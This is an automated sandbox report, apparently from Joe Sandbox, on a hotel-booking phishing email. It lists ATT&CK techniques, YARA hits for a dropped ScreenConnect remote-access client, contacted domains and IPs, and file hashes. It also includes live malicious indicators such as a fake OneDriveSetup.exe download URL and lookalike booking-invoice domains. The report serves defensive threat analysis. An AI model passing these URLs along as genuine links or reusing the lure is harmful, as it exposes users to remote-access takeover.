                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
                      Source: Yara matchFile source: C:\Users\user\Downloads\eda2c7bf-7eeb-4af6-a518-8725894275d2.tmp, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\Downloads\Unconfirmed 111805.crdownload, type: DROPPED
                      Source: Yara matchFile source: 00000013.00000000.1809633017.0000000000446000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.1834609850.0000000005BA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001D.00000000.1894571066.0000000000D42000.00000002.00000001.01000000.0000001A.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.1838178371.00000000079F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.1827940305.0000000003371000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: C:\Windows\Temp\~DFD365F17729FDCDF2.TMP, type: DROPPED
                      Source: Yara matchFile source: C:\Windows\Installer\inprogressinstallinfo.ipi, type: DROPPED
                      Source: Yara matchFile source: C:\Windows\Temp\~DFCA3227996840FADD.TMP, type: DROPPED
                      Source: Yara matchFile source: C:\Config.Msi\564c4a.rbs, type: DROPPED
                      Source: Yara matchFile source: C:\Windows\Installer\MSI4F17.tmp, type: DROPPED
                      Source: Yara matchFile source: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.WindowsClient.exe, type: DROPPED
                      Source: Yara matchFile source: 0000001D.00000002.2416415621.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000002.2418379726.0000000002781000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire Infrastructure1
                      Replication Through Removable Media
                      41
                      Windows Management Instrumentation
                      1
                      DLL Side-Loading
                      1
                      DLL Side-Loading
                      21
                      Disable or Modify Tools
                      OS Credential Dumping11
                      Peripheral Device Discovery
                      Remote Services1
                      Clipboard Data
                      1
                      Ingress Tool Transfer
                      Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts1
                      Command and Scripting Interpreter
                      1
                      Component Object Model Hijacking
                      1
                      Extra Window Memory Injection
                      1
                      DLL Side-Loading
                      LSASS Memory1
                      File and Directory Discovery
                      Remote Desktop ProtocolData from Removable Media1
                      Encrypted Channel
                      Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAt2
                      Windows Service
                      1
                      Component Object Model Hijacking
                      1
                      File Deletion
                      Security Account Manager55
                      System Information Discovery
                      SMB/Windows Admin SharesData from Network Shared Drive1
                      Non-Standard Port
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCron21
                      Browser Extensions
                      2
                      Windows Service
                      1
                      Extra Window Memory Injection
                      NTDS5
                      Security Software Discovery
                      Distributed Component Object ModelInput Capture3
                      Non-Application Layer Protocol
                      Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script11
                      Process Injection
                      22
                      Masquerading
                      LSA Secrets1
                      Process Discovery
                      SSHKeylogging4
                      Application Layer Protocol
                      Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      Modify Registry
                      Cached Domain Credentials71
                      Virtualization/Sandbox Evasion
                      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items71
                      Virtualization/Sandbox Evasion
                      DCSync1
                      Application Window Discovery
                      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
                      Process Injection
                      Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                      Rundll32
                      /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      Dear david@corerecon.com - Your Stay Has Been Successfully Booked Ocean Breeze Retreat.msg0%VirustotalBrowse
                      SourceDetectionScannerLabelLink
                      C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.Client.dll0%ReversingLabs
                      C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.ClientService.dll0%ReversingLabs
                      C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.ClientService.exe0%ReversingLabs
                      C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.Core.dll0%ReversingLabs
                      C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.WindowsAuthenticationPackage.dll0%ReversingLabs
                      C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.WindowsBackstageShell.exe0%ReversingLabs
                      C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.WindowsClient.exe0%ReversingLabs
                      C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.WindowsCredentialProvider.dll0%ReversingLabs
                      C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.WindowsFileManager.exe0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\MSI436F.tmp0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\MSI436F.tmp-\Microsoft.Deployment.Compression.Cab.dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\MSI436F.tmp-\Microsoft.Deployment.Compression.dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\MSI436F.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\MSI436F.tmp-\Microsoft.Deployment.WindowsInstaller.dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\MSI436F.tmp-\ScreenConnect.InstallerActions.dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\MSI436F.tmp-\ScreenConnect.Windows.dll0%ReversingLabs
                      C:\Windows\Installer\MSI512D.tmp0%ReversingLabs
                      No Antivirus matches
                      No Antivirus matches
                      SourceDetectionScannerLabelLink
                      https://cl.s12.exct.net/?qs=dd02f46a2b01ff14c8b7f5d6eee791994ec9db7224e2b8c6008c3bb428429855c449a2273d72377f007301aae3a4af35ed3799ed1629b5470%Avira URL Cloudsafe
                      https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=oceanbreeze.&oit=1&cp=12&pgcl=7&gs_rn=42&psi=Ta3SbLoPbtz4sM0f&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE0%Avira URL Cloudsafe
                      https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=oceanbreeze.com&oit=3&cp=15&pgcl=7&gs_rn=42&psi=Ta3SbLoPbtz4sM0f&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE0%Avira URL Cloudsafe
                      https://bitbucket.org/buildthefuturewithusholloway/tryandtrytogetbonus/downloads/OneDriveSetup.exe0%Avira URL Cloudsafe
                      http://oceanbreeze.com/lander0%Avira URL Cloudsafe
                      https://a.nel.cloudflare.com/report/v4?s=sB8iJCio4Zz%2FbXF2k964ZV39BQuDWTneCKrKKAiuPLko5tFsljyQzVMqJVz0U%2BFJeunEc7Cjt5qdY1g%2FW3eqUJcoaWyHRWFlLuQo%2FlddAxwfHXeIzz7B1PXDcYyv3fCVD6FoZEGvSPg%3D0%Avira URL Cloudsafe
                      https://upload.wikimedia.org/wikipedia/commons/8/87/PDF_file_icon.svg0%Avira URL Cloudsafe
                      https://api.aws.parking.godaddy.com/v1/domains/domain?domain=oceanbreeze.com&portfolioId=&abp=1&gdabp=true0%Avira URL Cloudsafe
                      https://afs.googleusercontent.com/ad_icons/standard/publisher_icon_image/search.svg?c=%230f1c210%Avira URL Cloudsafe
                      https://afs.googleusercontent.com/ad_icons/standard/publisher_icon_image/chevron.svg?c=%230f1c210%Avira URL Cloudsafe
                      https://apis.google.com/domainreliability/upload0%Avira URL Cloudsafe
                      https://onedrive.com/0%Avira URL Cloudsafe
                      https://a.nel.cloudflare.com/report/v4?s=%2FjyhAuw7uXqAtYkOe%2F2B2sCAU9Pw9pDllNE7u3SB5zkwaRcj8IizbZBV4rNsEomy%2BCeEaQbuUOt3k0ijh8SL3Zy9wCfKMagjJXOLF9vhh07j9HKewbB6o0v7%2Fi6zrFVRLsPLm4JW90k%3D0%Avira URL Cloudsafe
                      https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js0%Avira URL Cloudsafe
                      NameIPActiveMaliciousAntivirus DetectionReputation
                      gddomainparking.com
                      52.1.248.136
                      truefalse
                        unknown
                        bitbucket.org
                        185.166.143.48
                        truefalse
                          high
                          onedrive.com
                          51.105.104.217
                          truefalse
                            unknown
                            e40258.g.akamaiedge.net
                            95.101.182.89
                            truefalse
                              high
                              mcr-9999.mcr-msedge.net
                              150.171.70.254
                              truefalse
                                unknown
                                beacons-handoff.gcp.gvt2.com
                                142.251.143.67
                                truefalse
                                  high
                                  cl.s12.exct.net
                                  13.110.204.9
                                  truetrue
                                    unknown
                                    beacons6.gvt2.com
                                    172.217.18.99
                                    truefalse
                                      high
                                      a46.dscr.akamai.net
                                      2.16.238.158
                                      truefalse
                                        high
                                        www.google.com
                                        142.250.186.68
                                        truefalse
                                          high
                                          skillsyne.us
                                          104.21.48.1
                                          truefalse
                                            unknown
                                            e10583.dspg.akamaiedge.net
                                            23.192.243.7
                                            truefalse
                                              high
                                              a.nel.cloudflare.com
                                              35.190.80.1
                                              truefalse
                                                high
                                                plus.l.google.com
                                                142.250.185.206
                                                truefalse
                                                  high
                                                  bookinginvoiceview.com
                                                  172.67.171.74
                                                  truefalse
                                                    unknown
                                                    syndicatedsearch.goog
                                                    142.250.184.238
                                                    truefalse
                                                      high
                                                      oceanbreeze.com
                                                      13.248.169.48
                                                      truefalse
                                                        unknown
                                                        beacons2.gvt2.com
                                                        64.233.168.94
                                                        truefalse
                                                          high
                                                          beacons.gvt2.com
                                                          142.250.185.227
                                                          truefalse
                                                            high
                                                            sni1gl.wpc.zetacdn.net
                                                            152.199.21.175
                                                            truefalse
                                                              high
                                                              s3-w.us-east-1.amazonaws.com
                                                              52.217.194.81
                                                              truefalse
                                                                high
                                                                dual-spov-0006.spov-msedge.net
                                                                13.107.137.11
                                                                truefalse
                                                                  unknown
                                                                  spo-9999.spo-msedge.net
                                                                  13.107.136.254
                                                                  truefalse
                                                                    unknown
                                                                    upload.wikimedia.org
                                                                    185.15.59.240
                                                                    truefalse
                                                                      high
                                                                      e13678.dscg.akamaiedge.net
                                                                      2.19.106.98
                                                                      truefalse
                                                                        high
                                                                        s-0005.dual-s-msedge.net
                                                                        52.123.129.14
                                                                        truefalse
                                                                          high
                                                                          bookinghqsupport.top
                                                                          199.127.62.110
                                                                          truetrue
                                                                            unknown
                                                                            googlehosted.l.googleusercontent.com
                                                                            172.217.18.1
                                                                            truefalse
                                                                              high
                                                                              bookingmanageview.com
                                                                              104.21.23.27
                                                                              truefalse
                                                                                high
                                                                                img1.wsimg.com
                                                                                unknown
                                                                                unknownfalse
                                                                                  high
                                                                                  bbuseruploads.s3.amazonaws.com
                                                                                  unknown
                                                                                  unknownfalse
                                                                                    high
                                                                                    afs.googleusercontent.com
                                                                                    unknown
                                                                                    unknownfalse
                                                                                      high
                                                                                      beacons.gcp.gvt2.com
                                                                                      unknown
                                                                                      unknownfalse
                                                                                        high
                                                                                        assets.onestore.ms
                                                                                        unknown
                                                                                        unknownfalse
                                                                                          unknown
                                                                                          ajax.aspnetcdn.com
                                                                                          unknown
                                                                                          unknownfalse
                                                                                            high
                                                                                            c.s-microsoft.com
                                                                                            unknown
                                                                                            unknownfalse
                                                                                              high
                                                                                              onedrive.live.com
                                                                                              unknown
                                                                                              unknownfalse
                                                                                                unknown
                                                                                                api.aws.parking.godaddy.com
                                                                                                unknown
                                                                                                unknownfalse
                                                                                                  unknown
                                                                                                  apis.google.com
                                                                                                  unknown
                                                                                                  unknownfalse
                                                                                                    high
                                                                                                    NameMaliciousAntivirus DetectionReputation
                                                                                                    https://apis.google.com/domainreliability/uploadfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    https://api.aws.parking.godaddy.com/v1/parkingEvents?abp=1&gdabp=truefalse
                                                                                                      high
                                                                                                      https://bitbucket.org/buildthefuturewithusholloway/tryandtrytogetbonus/downloads/OneDriveSetup.exefalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      https://onedrive.com/false
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      https://a.nel.cloudflare.com/report/v4?s=sB8iJCio4Zz%2FbXF2k964ZV39BQuDWTneCKrKKAiuPLko5tFsljyQzVMqJVz0U%2BFJeunEc7Cjt5qdY1g%2FW3eqUJcoaWyHRWFlLuQo%2FlddAxwfHXeIzz7B1PXDcYyv3fCVD6FoZEGvSPg%3Dfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      https://cl.s12.exct.net/?qs=dd02f46a2b01ff14c8b7f5d6eee791994ec9db7224e2b8c6008c3bb428429855c449a2273d72377f007301aae3a4af35ed3799ed1629b547false
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=oceanbreeze.com&oit=3&cp=15&pgcl=7&gs_rn=42&psi=Ta3SbLoPbtz4sM0f&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhEfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      https://assets.onestore.ms/cdnfiles/external/mwf/long/v1/v1.25.0/css/mwf-west-european-default.min.cssfalse
                                                                                                        high
                                                                                                        https://www.google.com/async/newtab_promosfalse
                                                                                                          high
                                                                                                          https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.jsfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          https://oceanbreeze.com/landerfalse
                                                                                                            unknown
                                                                                                            https://onedrive.live.com/false
                                                                                                              high
                                                                                                              https://api.aws.parking.godaddy.com/v1/domains/domain?domain=oceanbreeze.com&portfolioId=&abp=1&gdabp=truefalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              https://www.google.com/async/ddljson?async=ntp:2false
                                                                                                                high
                                                                                                                https://a.nel.cloudflare.com/report/v4?s=%2FjyhAuw7uXqAtYkOe%2F2B2sCAU9Pw9pDllNE7u3SB5zkwaRcj8IizbZBV4rNsEomy%2BCeEaQbuUOt3k0ijh8SL3Zy9wCfKMagjJXOLF9vhh07j9HKewbB6o0v7%2Fi6zrFVRLsPLm4JW90k%3Dfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                unknown
                                                                                                                https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=oceanbreeze.&oit=1&cp=12&pgcl=7&gs_rn=42&psi=Ta3SbLoPbtz4sM0f&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhEfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                unknown
                                                                                                                https://upload.wikimedia.org/wikipedia/commons/8/87/PDF_file_icon.svgfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                unknown
                                                                                                                https://bookingmanageview.com/lnvoice/B-37288321/true
                                                                                                                  unknown
                                                                                                                  http://oceanbreeze.com/landerfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  https://afs.googleusercontent.com/ad_icons/standard/publisher_icon_image/chevron.svg?c=%230f1c21false
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0false
                                                                                                                    high
                                                                                                                    https://afs.googleusercontent.com/ad_icons/standard/publisher_icon_image/search.svg?c=%230f1c21false
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    unknown
                                                                                                                    http://oceanbreeze.com/false
                                                                                                                      unknown
                                                                                                                      https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhEfalse
                                                                                                                        high
                                                                                                                        https://www.google.com/adsense/domains/caf.js?abp=1&gdabp=truefalse
                                                                                                                          high
                                                                                                                          • No. of IPs < 25%
                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                          • 75% < No. of IPs
                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                          104.21.48.1
                                                                                                                          skillsyne.usUnited States
                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                          142.250.186.68
                                                                                                                          www.google.comUnited States
                                                                                                                          15169GOOGLEUSfalse
                                                                                                                          104.21.23.27
                                                                                                                          bookingmanageview.comUnited States
                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                          142.250.74.202
                                                                                                                          unknownUnited States
                                                                                                                          15169GOOGLEUSfalse
                                                                                                                          142.250.74.206
                                                                                                                          unknownUnited States
                                                                                                                          15169GOOGLEUSfalse
                                                                                                                          20.189.173.5
                                                                                                                          unknownUnited States
                                                                                                                          8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                          95.101.149.131
                                                                                                                          unknownEuropean Union
                                                                                                                          20940AKAMAI-ASN1EUfalse
                                                                                                                          142.251.40.206
                                                                                                                          unknownUnited States
                                                                                                                          15169GOOGLEUSfalse
                                                                                                                          172.67.171.74
                                                                                                                          bookinginvoiceview.comUnited States
                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                          142.250.185.227
                                                                                                                          beacons.gvt2.comUnited States
                                                                                                                          15169GOOGLEUSfalse
                                                                                                                          52.111.236.34
                                                                                                                          unknownUnited States
                                                                                                                          8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                          2.19.106.98
                                                                                                                          e13678.dscg.akamaiedge.netEuropean Union
                                                                                                                          16625AKAMAI-ASUSfalse
                                                                                                                          142.250.185.142
                                                                                                                          unknownUnited States
                                                                                                                          15169GOOGLEUSfalse
                                                                                                                          52.217.194.81
                                                                                                                          s3-w.us-east-1.amazonaws.comUnited States
                                                                                                                          16509AMAZON-02USfalse
                                                                                                                          51.105.104.217
                                                                                                                          onedrive.comUnited Kingdom
                                                                                                                          8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                          23.192.243.7
                                                                                                                          e10583.dspg.akamaiedge.netUnited States
                                                                                                                          16625AKAMAI-ASUSfalse
                                                                                                                          35.190.80.1
                                                                                                                          a.nel.cloudflare.comUnited States
                                                                                                                          15169GOOGLEUSfalse
                                                                                                                          142.250.186.35
                                                                                                                          unknownUnited States
                                                                                                                          15169GOOGLEUSfalse
                                                                                                                          13.110.204.9
                                                                                                                          cl.s12.exct.netUnited States
                                                                                                                          14340SALESFORCEUStrue
                                                                                                                          13.248.169.48
                                                                                                                          oceanbreeze.comUnited States
                                                                                                                          16509AMAZON-02USfalse
                                                                                                                          1.1.1.1
                                                                                                                          unknownAustralia
                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                          74.125.133.84
                                                                                                                          unknownUnited States
                                                                                                                          15169GOOGLEUSfalse
                                                                                                                          2.19.11.103
                                                                                                                          unknownEuropean Union
                                                                                                                          719ELISA-ASHelsinkiFinlandEUfalse
                                                                                                                          13.107.42.16
                                                                                                                          unknownUnited States
                                                                                                                          8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                          172.217.18.1
                                                                                                                          googlehosted.l.googleusercontent.comUnited States
                                                                                                                          15169GOOGLEUSfalse
                                                                                                                          104.124.11.162
                                                                                                                          unknownUnited States
                                                                                                                          20940AKAMAI-ASN1EUfalse
                                                                                                                          152.199.21.175
                                                                                                                          sni1gl.wpc.zetacdn.netUnited States
                                                                                                                          15133EDGECASTUSfalse
                                                                                                                          104.124.11.201
                                                                                                                          unknownUnited States
                                                                                                                          20940AKAMAI-ASN1EUfalse
                                                                                                                          142.250.184.238
                                                                                                                          syndicatedsearch.googUnited States
                                                                                                                          15169GOOGLEUSfalse
                                                                                                                          52.109.76.240
                                                                                                                          unknownUnited States
                                                                                                                          8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                          2.19.97.184
                                                                                                                          unknownEuropean Union
                                                                                                                          20940AKAMAI-ASN1EUfalse
                                                                                                                          142.250.185.78
                                                                                                                          unknownUnited States
                                                                                                                          15169GOOGLEUSfalse
                                                                                                                          142.250.185.206
                                                                                                                          plus.l.google.comUnited States
                                                                                                                          15169GOOGLEUSfalse
                                                                                                                          95.101.182.89
                                                                                                                          e40258.g.akamaiedge.netEuropean Union
                                                                                                                          20940AKAMAI-ASN1EUfalse
                                                                                                                          52.109.89.18
                                                                                                                          unknownUnited States
                                                                                                                          8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                          52.123.129.14
                                                                                                                          s-0005.dual-s-msedge.netUnited States
                                                                                                                          8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                          216.58.206.35
                                                                                                                          unknownUnited States
                                                                                                                          15169GOOGLEUSfalse
                                                                                                                          185.15.59.240
                                                                                                                          upload.wikimedia.orgNetherlands
                                                                                                                          14907WIKIMEDIAUSfalse
                                                                                                                          20.189.173.18
                                                                                                                          unknownUnited States
                                                                                                                          8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                          2.16.238.158
                                                                                                                          a46.dscr.akamai.netEuropean Union
                                                                                                                          20940AKAMAI-ASN1EUfalse
                                                                                                                          52.1.248.136
                                                                                                                          gddomainparking.comUnited States
                                                                                                                          14618AMAZON-AESUSfalse
                                                                                                                          23.199.214.10
                                                                                                                          unknownUnited States
                                                                                                                          16625AKAMAI-ASUSfalse
                                                                                                                          13.107.137.11
                                                                                                                          dual-spov-0006.spov-msedge.netUnited States
                                                                                                                          8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                          216.58.212.132
                                                                                                                          unknownUnited States
                                                                                                                          15169GOOGLEUSfalse
                                                                                                                          40.126.32.72
                                                                                                                          unknownUnited States
                                                                                                                          8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                          142.250.181.225
                                                                                                                          unknownUnited States
                                                                                                                          15169GOOGLEUSfalse
                                                                                                                          142.250.185.130
                                                                                                                          unknownUnited States
                                                                                                                          15169GOOGLEUSfalse
                                                                                                                          185.166.143.48
                                                                                                                          bitbucket.orgGermany
                                                                                                                          16509AMAZON-02USfalse
                                                                                                                          199.127.62.110
                                                                                                                          bookinghqsupport.topUnited States
                                                                                                                          23470RELIABLESITEUStrue
                                                                                                                          IP
                                                                                                                          127.0.0.1
                                                                                                                          192.168.2.16
                                                                                                                          Joe Sandbox version:42.0.0 Malachite
                                                                                                                          Analysis ID:1632450
                                                                                                                          Start date and time:2025-03-07 23:32:05 +01:00
                                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                                          Overall analysis duration:
                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                          Report type:full
                                                                                                                          Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                          Number of analysed new started processes analysed:39
                                                                                                                          Number of new started drivers analysed:0
                                                                                                                          Number of existing processes analysed:0
                                                                                                                          Number of existing drivers analysed:0
                                                                                                                          Number of injected processes analysed:1
                                                                                                                          Technologies:
                                                                                                                          • EGA enabled
                                                                                                                          Analysis Mode:stream
                                                                                                                          Analysis stop reason:Timeout
                                                                                                                          Sample name:Dear david@corerecon.com - Your Stay Has Been Successfully Booked Ocean Breeze Retreat.msg
                                                                                                                          Detection:MAL
                                                                                                                          Classification:mal76.evad.winMSG@84/84@92/211
                                                                                                                          Cookbook Comments:
                                                                                                                          • Found application associated with file extension: .msg
                                                                                                                          • Exclude process from analysis (whitelisted): svchost.exe
                                                                                                                          • Excluded IPs from analysis (whitelisted): 2.19.11.103, 2.19.11.102, 52.123.129.14
                                                                                                                          • Excluded domains from analysis (whitelisted): ecs.office.com, omex.cdn.office.net, dual-s-0005-office.config.skype.com, login.live.com, ecs.office.trafficmanager.net, omex.cdn.office.net.akamaized.net, a1864.dscd.akamai.net
                                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                          • Report size getting too big, too many NtEnumerateValueKey calls found.
                                                                                                                          • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                          • Report size getting too big, too many NtOpenKey calls found.
                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                          • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                          • Timeout during stream target processing, analysis might miss dynamic analysis data
                                                                                                                          • VT rate limit hit for: bookinginvoiceview.com
                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                          File Type:data
                                                                                                                          Category:modified
                                                                                                                          Size (bytes):219728
                                                                                                                          Entropy (8bit):6.583473654268572
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:9D5E0BA436FB770869D9F258B2CCAD87
                                                                                                                          SHA1:58A10A08616ACF0627C3563238D119A02ECACA86
                                                                                                                          SHA-256:E0EEC8F6E28AAC4B251B3BD15007901425E019B969F62719AB13F1B4D80B696F
                                                                                                                          SHA-512:769B28334347110C3F8901243029CE4021A21C19FC9C21EB0B3480B5CB6E5FE61746CD4DC9677692BBBBDA35E1AAFCE62E39421B23FB3EE8C45EBD333F430957
                                                                                                                          Malicious:false
                                                                                                                          Yara Hits:
                                                                                                                          • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Config.Msi\564c4a.rbs, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Config.Msi\564c4a.rbs, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Config.Msi\564c4a.rbs, Author: Joe Security
                                                                                                                          Reputation:unknown
